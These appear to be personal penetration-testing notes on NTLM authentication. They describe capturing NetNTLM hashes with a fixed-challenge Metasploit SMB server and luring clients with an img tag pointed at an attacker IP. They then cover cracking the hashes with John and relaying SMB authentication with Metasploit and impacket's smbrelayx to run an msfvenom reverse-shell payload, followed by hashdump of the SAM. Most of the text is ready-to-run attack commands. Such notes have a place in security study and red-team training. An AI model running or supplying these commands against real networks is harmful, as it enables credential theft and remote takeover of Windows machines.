https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ NTLM(nt lan manager) is what windows clients use to authenticate to windows servers. This mostly has been replaced by kerberos but is still used when the client tries to authenticate with either an IP or belongs to a different domain. Versions: LM, NTLM, NTLMv2, kerberos. For backwards compatibility LM hashes(DES) may sometimes still be stored and sent in the NTLM proto NTLM is a challenge/response protocol with 3 message types: Negotiation, challenge, authentication. Negotiation: Client sends clear text username Challenge: Server generates challenge and sends to client Authentication: Client encrypts the challenge with the hash of the user's password and returns the results to the server Killchain Combos: Responder, ntlmrelayx Responder, multirealy, msf(tools) Mitm6, ntlmrelayx Responder, crack hash, login/dump ad Responder, crack hash, kerberoast ? Responder, empire The vulnerability here is in catching the authentication/challenge response message. We can capture it either by MiTM sniff or impersonating a server and getting the client to connect to us. MiTM: Impersonation:(LM or NTLMv1) Set up a listening SMB service and use a fixed challenge string to send to clients. MSF has a module to do this for us: MSF: > use auxiliary/server/capture/smb in the options set: CHALLENGE = 1122334455667788 and JOHNPWFILE = hashpwd //the first is our challenge string and the second tells msf to save the hashes in a file and put them in john format for cracking later. By using the fixed number string we are creating a salt and because we use a common salt we can rainbow table decrypt this easily. We then need to initiate the NTLM protocol on the client. Easiest with SMB. We can embed “\\SERVER_IP\\SHARE” into an email or webpage. ex: <img src="\\ourAttackerIP\\ADMIN$"> When our page is opened:

Note the hashes are different. This is because LM is also enabled. If both LM and NT hash are the same then LM is disabled. For passwords shorter than 7 character the last 8bytes will always be 2f85252cc731bb25 since the last octet of the hashing algorithm is all 0's for padding. The file should be saved as hashpwd_netntlm Crack the output in John: #john --format=netlm hashpwd_netntlm

//if this method does not work to crack the hash then we need to use a rainbow cracking tool set like rcracki_mt(crack first octet), halflm_second.rb(msf, get next octet), netntlm.pl(go from all caps password to real pass) ----NTLMv2-----(Need to pass/SMB Relay): --summary--

For this to work we need: 1) Admin on the Target machine. 2) "Network security:Lan Manager auth level" set to “Send LM & NTLM responses”

//some situations it may still work without this. ---- MSF: > use /exploit/windows/smb/smb_relay

Once we run it then we just need to sit and wait for a connection. This could be from updates, patch management, backups. Once the connection attempt is started the tool will auto pwn for us. Impacket: Here we will utilize smbrelayx.py from impacket and catch the msfvenom shell with an msf meterpreter session. #msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4455 -f exe -o smbexp.exe msf> use exploit/multi/handler

run the listener. #smbrelayx.py -h 192.168.102.149 -e /home/stduser/smbexp.exe //now wait for a host to try a connection. We will see the session open in msf when working. -------------- Dump SAM: //We already have a system shell. Some OSes this will work with admin shells meterpreter> run hashdump //If we get an operation failed message try to migrate to another process then attempt the "run hashdump" again.